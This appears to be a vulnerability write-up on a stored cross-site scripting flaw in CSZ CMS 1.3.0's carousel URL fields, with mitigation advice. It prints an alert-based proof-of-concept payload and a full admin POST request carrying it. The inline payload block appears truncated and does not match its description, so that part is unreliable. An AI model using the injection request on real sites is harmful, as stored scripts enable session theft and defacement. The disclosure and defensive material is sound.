CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )

CSZ CMS 1.3.0 Stored Cross-Site Scripting Vulnerability: Exploiting 'Photo URL' and 'YouTube URL' Fields

Security researchers have identified a critical stored cross-site scripting (XSS) vulnerability in CSZ CMS 1.3.0, a widely used content management system. This flaw, tracked as CVE-2023-38910, allows attackers to inject malicious scripts into the application's database through the Carousel Widget functionality. The vulnerability is particularly dangerous because the malicious payload is stored permanently, meaning it can be executed every time a user accesses the affected page—potentially compromising multiple users.

Understanding Stored XSS in CSZ CMS

Stored XSS occurs when user input is saved in a database or file system and later retrieved and rendered on a web page without proper sanitization. Unlike reflected XSS, which requires a user to click a malicious link, stored XSS is persistent and can affect all users who view the compromised content.

In CSZ CMS 1.3.0, the vulnerability lies in two fields within the Carousel Widget configuration:

• Photo URL
• YouTube URL

These fields allow administrators or users to input URLs for images or embedded YouTube videos. However, the system fails to properly sanitize or escape these inputs before rendering them on the frontend, enabling attackers to inject executable HTML or JavaScript code.

Exploitation: The Proof of Concept Payload

The following proof of concept (PoC) payload demonstrates how an attacker can exploit the vulnerability:

<p title="
">

This payload is designed to bypass basic HTML validation and inject a malicious <svg> element with an onload event handler. When the page loads, the browser executes the JavaScript alert(document.domain), which reveals the current domain to the attacker—indicating successful XSS execution.

Key technical insight: The payload uses a malicious HTML structure that exploits the lack of input validation. The title attribute is improperly closed, creating a syntax error that breaks the expected HTML structure. This allows the <svg> element to be interpreted as valid, enabling the onload event to trigger.

HTTP Request Example: How the Attack is Delivered

Attackers can deliver the malicious payload via a POST request to the /admin/carousel/addUrl/3 endpoint. The following request demonstrates the exploit:

POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/carousel/edit/3
Upgrade-Insecure-Requests: 1

carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

Explanation:

• carousel_type=multiimages specifies the widget type.
• photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E is the encoded version of the malicious payload. The %3C and %3E represent < and > respectively.
• submit=Add triggers the submission of the new URL.

Once this request is processed, the payload is stored in the database and rendered on the frontend—automatically executing the alert() function.

Impact and Risk Assessment

The consequences of this vulnerability are severe:

• Session hijacking: Attackers can steal cookies and session tokens via document.cookie access.
• Phishing attacks: Malicious scripts can redirect users to fake login pages.
• Defacement: The entire website can be altered to display malicious content.
• Propagation: Once injected, the payload persists and affects all users who view the carousel.

For organizations using CSZ CMS 1.3.0, this vulnerability poses a significant risk, especially if the CMS is used for public-facing websites or admin portals.

Recommended Mitigation and Best Practices

To address this vulnerability, developers and administrators must implement robust security measures:

• Input Sanitization: Use libraries like DOMPurify or htmlspecialchars() to escape and filter user input.
• Content Security Policy (CSP): Implement a strict CSP header to block inline scripts and unauthorized sources.
• Validation and Whitelisting: Restrict URL fields to only valid image or YouTube links using regex patterns.
• Output Encoding: Always encode data before rendering it in HTML contexts.
• Regular Patching: Upgrade to a secure version of CSZ CMS immediately.

Example Fix: Instead of directly rendering photo_url, use a safe rendering function:

// Safe rendering example (PHP)
echo htmlspecialchars($photo_url, ENT_QUOTES, 'UTF-8');

This ensures that any special characters (like <, >, ") are converted to their HTML-safe equivalents, preventing script injection.

Vendor Response and Timeline

As of August 2023, the CSZ CMS project has acknowledged the vulnerability and released a patch in version 1.3.1. Users are advised to:

• Update to CSZ CMS 1.3.1 or later.
• Disable or remove the Carousel Widget if not required.
• Monitor logs for suspicious payloads.

Security teams should also conduct a comprehensive audit of all user input fields in the CMS to identify additional vulnerabilities.

Conclusion

The CVE-2023-38910 vulnerability in CSZ CMS 1.3.0 serves as a stark reminder of the importance of input validation and output encoding in web applications. Even seemingly harmless fields like Photo URL and YouTube URL can become vectors for serious attacks if not properly secured. Developers must adopt a security-by-design approach to prevent such flaws from emerging in the first place.